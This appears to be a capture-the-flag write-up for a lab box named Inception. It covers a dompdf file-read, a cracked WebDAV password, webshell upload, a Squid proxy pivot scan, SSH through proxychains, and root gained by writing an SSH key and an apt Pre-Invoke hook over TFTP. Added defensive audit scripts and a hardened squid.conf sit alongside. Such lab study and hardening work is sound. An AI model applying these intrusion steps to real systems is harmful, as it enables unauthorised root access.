Basic info

Port scan

Ports 80 and 3128:

$ nmap -sC -sV 10.10.10.67

Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 14:04 CST
Nmap scan report for 10.10.10.67
Host is up (0.069s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Inception
3128/tcp open  http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.14 seconds

Port 80

The bottom of the page source gives a hint: dompdf.

[image: dompdf]

Browsing directly to the dompdf directory lists its files; the version file shows it is 0.6.0:

[image: vulns]

Searching turns up two vulnerabilities:

File read

The file read renders the target file into a PDF; base64-decoding the embedded data gives the file contents:

[image: webdav]

Next we read files to gather information and find a WebDAV share:

/etc/apache2/sites-enabled/000-default.conf
Alias /webdav_test_inception /var/www/html/webdav_test_inception
<Location /webdav_test_inception>
Options FollowSymLinks
DAV On
AuthType Basic
AuthName "webdav test credential"
AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
Require valid-user
</Location>

# read the WebDAV password file
/var/www/html/webdav_test_inception/webdav.passwd
webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
# cracked plaintext
babygurl69
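Two things in that configuration are worth flagging from the defender's side: the `AuthUserFile` sits inside a directory Apache serves (the same directory the Alias points at, under the web root), which is exactly why a file-read bug in another application could fetch it, and the entry uses the `$apr1$` scheme, an iterated MD5 that offline tools crack quickly, when `htpasswd -B` would give bcrypt. The following audit script is an added example, not part of the original write-up; it takes the `<Location>` block and the password line shown above as constructed input (the `DocumentRoot /var/www/html` line is an assumed Ubuntu default that is not on the page) and reports both problems.

```python
"""Audit an Apache WebDAV block: is the AuthUserFile stored under a served
path, and which hash schemes do its entries use? Added example; the config
and password file below are constructed from the text of the write-up."""
import posixpath
import re
from typing import Dict, List

# Constructed input: the sites-enabled fragment from the write-up, plus an
# assumed Ubuntu-default DocumentRoot line that the page itself does not show.
APACHE_CONF = """
DocumentRoot /var/www/html
Alias /webdav_test_inception /var/www/html/webdav_test_inception
<Location /webdav_test_inception>
Options FollowSymLinks
DAV On
AuthType Basic
AuthName "webdav test credential"
AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
Require valid-user
</Location>
"""

# Constructed input: the single entry of webdav.passwd quoted in the write-up.
HTPASSWD = "webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0\n"

# Prefixes htpasswd(1) can emit; only bcrypt is a deliberately slow, salted hash.
SCHEMES = [
    ("$2y$", "bcrypt", False),
    ("$2a$", "bcrypt", False),
    ("$apr1$", "apr1 (iterated MD5)", True),
    ("{SHA}", "SHA-1 (unsalted)", True),
]


def served_roots(conf: str) -> List[str]:
    """Filesystem directories Apache serves: DocumentRoot plus every Alias target."""
    roots = re.findall(r"^\s*DocumentRoot\s+(\S+)", conf, re.M)
    roots += [target for _, target in re.findall(r"^\s*Alias\s+(\S+)\s+(\S+)", conf, re.M)]
    return [posixpath.normpath(r.strip('"')) for r in roots]


def under(path: str, root: str) -> bool:
    """True when path is root itself or lies below it (pure path comparison)."""
    path, root = posixpath.normpath(path), posixpath.normpath(root)
    return path == root or path.startswith(root.rstrip("/") + "/")


def classify(entry: str) -> Dict[str, object]:
    """Classify one 'user:hash' line by its hash scheme prefix."""
    user, _, digest = entry.partition(":")
    for prefix, name, weak in SCHEMES:
        if digest.startswith(prefix):
            return {"user": user, "scheme": name, "weak": weak}
    # Anything else is traditional crypt(3) or plaintext; both are weak.
    return {"user": user, "scheme": "crypt(3) or plaintext", "weak": True}


def audit(conf: str, passwd: str) -> Dict[str, object]:
    """Return served roots, classified entries and a list of human-readable findings."""
    findings = []
    roots = served_roots(conf)
    for userfile in re.findall(r"^\s*AuthUserFile\s+(\S+)", conf, re.M):
        userfile = userfile.strip('"')
        exposed = [r for r in roots if under(userfile, r)]
        if exposed:
            findings.append(f"AuthUserFile {userfile} lies under served path {exposed[0]}; move it outside the web root")
    entries = [classify(line) for line in passwd.splitlines() if line and not line.startswith("#")]
    for e in entries:
        if e["weak"]:
            findings.append(f"user {e['user']} uses {e['scheme']}; rehash with 'htpasswd -B'")
    return {"roots": roots, "entries": entries, "findings": findings}


if __name__ == "__main__":
    for finding in audit(APACHE_CONF, HTPASSWD)["findings"]:
        print("-", finding)
```

The path check is purely lexical, so it also catches an `AuthUserFile` placed under an `Alias` target that is outside `DocumentRoot`; symlinks (note the `Options FollowSymLinks` above) are not resolved and would need a filesystem-level check on the server itself.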

Webshell

Write a webshell through WebDAV:

Because the share is behind 401 Basic authentication, remember to configure the authentication header if you use AntSword:

wp-config.php

There is a WordPress install; its config gives the database credentials:

define('DB_USER', 'root');
define('DB_PASSWORD', 'VwPddNh7xMZyDQoByQL4');

Proxy scan

Since the Squid proxy on 3128 was seen earlier, try scanning the host itself through the proxy; port 22 turns out to be reachable that way:

msf6 exploit(windows/smb/ms17_010_eternalblue_win8) > use auxiliary/scanner/http/squid_pivot_scanning
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RPORT 3128
RPORT => 3128
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RHOSTS 10.10.10.67
RHOSTS => 10.10.10.67
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 127.0.0.1
RANGE => 127.0.0.1
msf6 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21,80,139,443,445,1433,1521,1723,3389,8080,9100,22
PORTS => 21,80,139,443,445,1433,1521,1723,3389,8080,9100,22
msf6 auxiliary(scanner/http/squid_pivot_scanning) > run
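The reason this works is a Squid access policy that lets an outside client fetch from the box's own loopback addresses, so a service bound only to 127.0.0.0/8 (SSH here) becomes reachable through the proxy. The fragment below is an added example, not the box's actual squid.conf (which the write-up never shows): the first block is the permissive policy that produces this behaviour, the second is the shape of the stock Squid 3.5 recommendations that close it. The `192.168.0.0/16` client range is an assumption to be replaced with the real client network.

```squid
# Weak: answer on every interface and forward anything, including requests
# for the proxy host's own loopback addresses.
http_port 3128
http_access allow all

# Corrected: the same listener with the stock Squid ACL ordering.
http_port 3128
acl localnet src 192.168.0.0/16               # assumed client network
acl to_localhost dst 127.0.0.0/8 0.0.0.0/32 ::1
acl SSL_ports port 443
acl Safe_ports port 80 443
acl CONNECT method CONNECT
http_access deny !Safe_ports                  # 22 is not a Safe_port, so the scan above gets 403
http_access deny CONNECT !SSL_ports
http_access deny to_localhost                 # covers 127.0.0.1 and 127.0.1.1 alike
http_access allow localnet
http_access deny all
```

Order matters in Squid: `http_access` rules are evaluated top to bottom and the first match wins, so the `deny to_localhost` and `deny !Safe_ports` lines must come before any `allow`. A defender can confirm the policy from the outside by requesting a loopback URL through the proxy and expecting a 403 rather than the backend's banner.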

SSH and user flag

So we can try connecting through the proxy (add the proxy to the proxychains config first); the password is the database root password:

http 10.10.10.67 3128

proxychains ssh cobb@127.0.1.1

Privilege escalation info

The current user has unrestricted sudo, but root.txt says the real flag is elsewhere:

Scanning

Based on the IP address, DNS configuration and similar hints, scan further:

nc -zv 192.168.0.1 1-65535 &> results && cat results | grep succeeded

FTP

FTP allows anonymous access, and what it exposes looks like the whole filesystem:

crontab

According to /etc/crontab, apt update runs every 5 minutes as root, and apt runs the commands configured in /etc/apt/apt.conf.d/ when it updates:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * root apt update 2>&1 >/var/log/apt/custom.log
30 23 * * * root apt upgrade -y 2>&1 >/dev/null

Exploitation

Generate an SSH key pair, upload the public key, upload the hook command as well, and wait for the cron job to trigger (FTP has no write access, but TFTP does; this can also be seen from its config file):

ssh-keygen

tftp 192.168.0.1
tftp> put /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys

echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > 00command

tftp 192.168.0.1
tftp> put 00command /etc/apt/apt.conf.d/00command
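What makes the chain above work is that apt treats every string under keys such as `APT::Update::Pre-Invoke` as a shell command to run as root, so write access to `/etc/apt/apt.conf.d/` (here through a TFTP daemon rooted at `/`) is equivalent to root. The script below is an added example, not part of the write-up: it inventories those hook keys across an `apt.conf.d` directory and flags hook files that a non-root user could modify. It builds its own sample directory in a temp location, containing a constructed benign hook and a copy of the `00command` file from the page, so it runs offline; on a real host point `audit_apt_conf_dir` at `/etc/apt/apt.conf.d`.

```python
"""Inventory the commands apt will execute as root via its *-Invoke hooks and
flag hook files writable by non-root users. Added example, not from the
write-up; the sample directory is constructed in a temp dir."""
import os
import re
import stat
import tempfile
from typing import Dict, List

# Configuration keys whose string values apt runs through the shell as root.
HOOK_KEYS = (
    "APT::Update::Pre-Invoke",
    "APT::Update::Post-Invoke",
    "APT::Update::Post-Invoke-Success",
    "DPkg::Pre-Invoke",
    "DPkg::Post-Invoke",
    "DPkg::Pre-Install-Pkgs",
)
HOOK_RE = re.compile(
    r"(" + "|".join(re.escape(k) for k in HOOK_KEYS) + r")\s*\{([^}]*)\}", re.S)
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def parse_hooks(text: str) -> List[Dict[str, str]]:
    """Return every (key, command) pair declared in one apt.conf fragment."""
    hooks = []
    for key, body in HOOK_RE.findall(text):
        for cmd in STRING_RE.findall(body):
            hooks.append({"key": key, "command": cmd})
    return hooks


def writable_by_others(path: str) -> bool:
    """True if the path is group- or world-writable, or not owned by root."""
    st = os.stat(path)
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)) or st.st_uid != 0


def audit_apt_conf_dir(conf_dir: str) -> Dict[str, object]:
    """List all hooks under conf_dir and report files/dirs a non-root user can write."""
    hooks, findings = [], []
    if writable_by_others(conf_dir):
        findings.append(f"{conf_dir} is writable by a non-root user; any file dropped here runs as root on the next apt run")
    for name in sorted(os.listdir(conf_dir)):
        path = os.path.join(conf_dir, name)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            file_hooks = parse_hooks(fh.read())
        for hook in file_hooks:
            hook["file"] = name
        hooks.extend(file_hooks)
        if file_hooks and writable_by_others(path):
            findings.append(f"{name} declares {len(file_hooks)} hook(s) and is writable by a non-root user")
    return {"hooks": hooks, "findings": findings}


def build_sample_dir() -> str:
    """Constructed sample apt.conf.d: one benign PackageKit-style hook and the
    00command file from the write-up, chmod 0666 to show the finding."""
    d = tempfile.mkdtemp(prefix="apt.conf.d-")
    with open(os.path.join(d, "20benign"), "w") as fh:
        fh.write('APT::Update::Post-Invoke-Success { "/usr/bin/test -e /var/run/fake.sock || true"; };\n')
    with open(os.path.join(d, "00command"), "w") as fh:
        fh.write('APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};\n')
    os.chmod(os.path.join(d, "00command"), 0o666)
    return d


if __name__ == "__main__":
    result = audit_apt_conf_dir(build_sample_dir())
    for hook in result["hooks"]:
        print(f"{hook['file']}: {hook['key']} -> {hook['command']}")
    for finding in result["findings"]:
        print("!", finding)
```

Running this against a real system as a periodic check gives you a baseline of expected hooks; a new file appearing in the inventory, or a hook whose command is not an absolute path to a root-owned binary, is what a defender should look at, alongside making sure no file-transfer service (FTP, TFTP, WebDAV) can write into `/etc` at all.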

Root flag

After the 5-minute cron job has run, ssh in and read root.txt:

References